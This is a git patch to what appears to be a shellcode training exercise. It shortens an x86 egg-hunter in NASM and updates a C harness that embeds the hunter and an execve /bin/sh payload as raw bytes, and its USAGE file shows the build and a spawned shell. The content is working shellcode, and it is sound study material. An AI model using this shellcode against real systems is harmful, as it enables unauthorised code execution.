From abf6ca0fe767c324e9fc29b261d63ae3c01a4a54 Mon Sep 17 00:00:00 2001 From: arno01 Date: Wed, 27 Mar 2013 17:02:50 +0100 Subject: [PATCH] minor updates --- exam3/USAGE | 11 +++++------ exam3/hunter.nasm | 8 -------- exam3/shellcode.c | 4 ++-- 3 files changed, 7 insertions(+), 16 deletions(-) diff --git a/exam3/USAGE b/exam3/USAGE index e04c367..e2492b0 100644 --- a/exam3/USAGE +++ b/exam3/USAGE @@ -10,8 +10,8 @@ exam3$ ln -svf payload-execve-stack.nasm payload.nasm 2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) -exam3$ ./make.sh "egg.mark" - [I] Using custom EGG mark: egg.mark +exam3$ ./make.sh "egg.MaRk" + [I] Using custom EGG mark: egg.MaRk [+] Compiling payload.nasm ... [+] Compiling hunter.nasm ... [+] Extracting PAYLOAD code from payload ... @@ -20,14 +20,13 @@ exam3$ ./make.sh "egg.mark" [+] Extracting HUNTER code from hunter ... [+] Checking HUNTER code for NULLs ... [+] Compiling shellcode.c ... --rwx------. 1 arno arno 5100 Mar 27 16:47 ./shellcode +-rwx------. 1 arno arno 5100 Mar 27 17:02 ./shellcode [+] All done! 3. Run the shellcode exam3$ ./shellcode -Hunter Length: 29 +Hunter Length: 21 Payload Length: 36 -sh-4.1$ exit - +sh-4.1$ diff --git a/exam3/hunter.nasm b/exam3/hunter.nasm index 3e16d88..da46f05 100644 --- a/exam3/hunter.nasm +++ b/exam3/hunter.nasm @@ -28,11 +28,6 @@ global _start _start: - jmp short huntersEnd - -continue: - pop eax ; Now EAX points at hunters End - ; Searching for the Egg marker next: inc eax ; Searching forward (can also try dec eax) @@ -43,6 +38,3 @@ isEgg: jne next call eax ; Once found, we call our payload - -huntersEnd: - call continue diff --git a/exam3/shellcode.c b/exam3/shellcode.c index daeff45..feaf2d7 100644 --- a/exam3/shellcode.c +++ b/exam3/shellcode.c @@ -1,11 +1,11 @@ #include #include -unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x6d\x61\x72\x6b\x75\xed\xff\xd0\xe8\xe5\xff\xff\xff"; +unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0"; unsigned char garbage1[] = "Just some garbage here..."; -unsigned char payload[] = "\x65\x67\x67\x2e\x6d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; +unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; unsigned char garbage2[] = "And some garbage there...";